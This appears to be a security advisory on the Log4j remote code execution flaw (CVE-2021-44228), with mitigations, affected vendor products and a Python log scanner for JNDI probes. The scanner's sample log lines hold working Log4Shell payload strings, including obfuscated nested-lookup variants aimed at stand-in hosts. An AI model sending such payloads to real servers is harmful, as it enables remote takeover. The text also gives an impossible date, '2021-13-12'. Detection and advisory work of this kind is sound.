Apache LOG4J Remote Code Execution Zero Day Vulnerability (CVE-2021-44228)

Overview

A remote-code execution vulnerability has been found in the prolific Java logging library Log4j. It can allow an attacker to execute arbitrary code on software using this library, which is likely to lead to full compromise of the underlying server. The library is used in a significant number of applications, both internally developed and third-party. We strongly advise everyone to review all internally developed and third-party applications for their potential exposure to this Log4j vulnerability.


We will continue to update this page as new information becomes available.



Security Advisory Details

CVE-2021-44228 is a critical remote code execution vulnerability in the Apache Log4j2 library, which can be found in a significant number of applications and platforms. In versions prior to 2.14.1, the lookup features used in configuration, log messages, and parameters do not protect against an attacker abusing the Log4j lookup mechanism to execute remote code on the vulnerable system. An attacker who can generate log messages can execute arbitrary code, which in the worst case provides full system access, when message lookup substitution is enabled. From Log4j 2.15.0, this behaviour is disabled by default. In earlier releases greater than 2.10, it can be mitigated by disabling lookups in log event messages.


Keep yourself protected

  • Update to version 2.15 (or higher if available) immediately. Apply the update to resolve the vulnerability as soon as it is released by the affected Vendors.

  • In versions greater than 2.10, set the JVM option -Dlog4j2.formatMsgNoLookups=true

  • Utilise security monitoring to detect incoming JNDI attacks using crafted messages or HTTP requests and responses.
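As an added defensive example (not part of the original advisory), the Python below scans log lines for the JNDI message-lookup pattern described above. It first undoes Log4j's nested lower/upper/default-value lookups so that a plain substring filter cannot be sidestepped, then matches on the resolved text. The log lines and host names are constructed for the example.

```python
import re

# Constructed access-log lines in which a client-supplied header has been
# logged verbatim. Hosts use the reserved ".invalid" TLD; none are real.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:rmi://example.invalid/b}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}ndi:${::-l}dap://example.invalid/c}"',
    '10.0.0.3 - - [10/Dec/2021:10:01:11 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.79"',
]

# An innermost lookup: ${...} whose body contains no further $, { or }.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What we are actually looking for once nesting has been resolved.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_one(match: re.Match) -> str:
    """Resolve a single innermost lookup the way Log4j would, where we can."""
    body = match.group(1)
    prefix, _, rest = body.partition(":")
    if prefix.lower() == "lower":          # ${lower:J} -> j
        return rest.lower()
    if prefix.lower() == "upper":          # ${upper:n} -> N
        return rest.upper()
    if ":-" in body:                       # ${name:-default} -> default, so ${::-j} -> j
        return body.split(":-", 1)[1]
    return match.group(0)                  # unknown lookups (jndi, date, ...) stay put


def normalize_lookups(text: str) -> str:
    """Repeatedly resolve innermost lookups until nothing more changes."""
    previous = None
    while previous != text:
        previous = text
        text = INNER_LOOKUP.sub(_resolve_one, text)
    return text


def is_log4shell_probe(line: str) -> bool:
    """True when the line contains a JNDI lookup after de-nesting."""
    return JNDI_LOOKUP.search(normalize_lookups(line)) is not None


def scan(lines):
    """Return the indices of lines that carry a JNDI lookup."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for i in scan(SAMPLE_LOG_LINES):
        print(f"line {i}: {SAMPLE_LOG_LINES[i]}")
```

The final sample line carries an unrelated `${date:...}` lookup and is correctly not flagged, which shows why matching on `jndi:` after normalisation is preferable to flagging every `${`.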


Affected products

A significant number of products from multiple vendors are affected, and investigations are still ongoing as to which products and services are affected. We have provided a summary of some of the more notably affected software applications below.

Vendor: Apache
Product(s): Log4j
Affected Version(s): All log4j-core versions between 2.0-beta9 and 2.14.1
Mitigation / Remediation: Update to version 2.15.0. In releases >=2.10, set either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases >=2.7 and <=2.14.1, see link for more information.

Vendor: Atlassian
Product(s): Jira Server & Data Center; Confluence Server & Data Center
Affected Version(s): On-premises. Only vulnerable when using a non-default config; the cloud version is still under investigation.
Mitigation / Remediation: Disable any configured appenders utilising org.apache.log4j.JMSAppender by commenting out the relevant lines in your Log4j configuration file and restarting the application.

Vendor: DatadogHQ
Product(s): Datadog Agent
Affected Version(s): 6 to 6.32.2; 7 to 7.32.2. The JMX monitoring component leverages an impacted version of log4j.
Mitigation / Remediation: Update to 7.32.2. The impacted library is still included; however, they have taken the recommended precautions to disable the vulnerable logic.

Vendor: F-Secure
Product(s): Endpoint Proxy; Policy Manager; Policy Manager Proxy
Affected Version(s): 13, 14, 15
Mitigation / Remediation: Download the patch from the F-Secure server.

Vendor: Graylog
Product(s): Graylog
Affected Version(s): < 3.3.15; < 4.0.14; < 4.1.9; < 4.2.3
Mitigation / Remediation: The Graylog development team incorporated this fix into all supported versions of the platform (v3.3.15, v4.0.14, v4.1.9, and v4.2.3). For any version under 3.3.15, upgrade or apply a change to the Graylog startup configuration.

Vendor: Puppet
Product(s): Continuous Delivery for Puppet Enterprise
Affected Version(s): 3.x; < 4.10.2
Mitigation / Remediation: Update available for version 4.x. Mitigations for 3.x, which is EOL.

Vendor: Symantec
Product(s): Symantec Endpoint Protection Manager
Affected Version(s): 14.3
Mitigation / Remediation:
  1. Set the system environment variable "LOG4J_FORMAT_MSG_NO_LOOKUPS" to "true".
  2. Restart the SEPM system services.

Vendor: Ubiquiti
Product(s): UniFi Network Application
Affected Version(s): < 6.5.54
Mitigation / Remediation: Upgrade to UniFi Network Application 6.5.54.

Vendor: VMware
Product(s): Carbon Black Cloud Workload Appliance
Affected Version(s): 1.x
Mitigation / Remediation: Patch pending.

Vendor: VMware
Product(s): Horizon
Affected Version(s): 8.x, 7.x
Mitigation / Remediation: Patch pending. Workaround: edit the registry to add -Dlog4j2.formatMsgNoLookups=true.

Vendor: VMware
Product(s): Site Recovery Manager
Affected Version(s): 8.x
Mitigation / Remediation: Patch pending. Workaround available, see link.

Vendor: VMware
Product(s): vCenter Server (Windows & Virtual Appliance)
Affected Version(s): 6.x; 7.x
Mitigation / Remediation: Patches pending. Workarounds available, see links.

A more comprehensive list of affected vendors and software applications is being maintained at: https://github.com/NCSC-NL/log4shell/tree/main/software


See our original advisory notification below.

2021-13-12 - Crossword Labs Security Advisory - Java Log4j Logging Library v3.pdf (PDF, 1.83MB)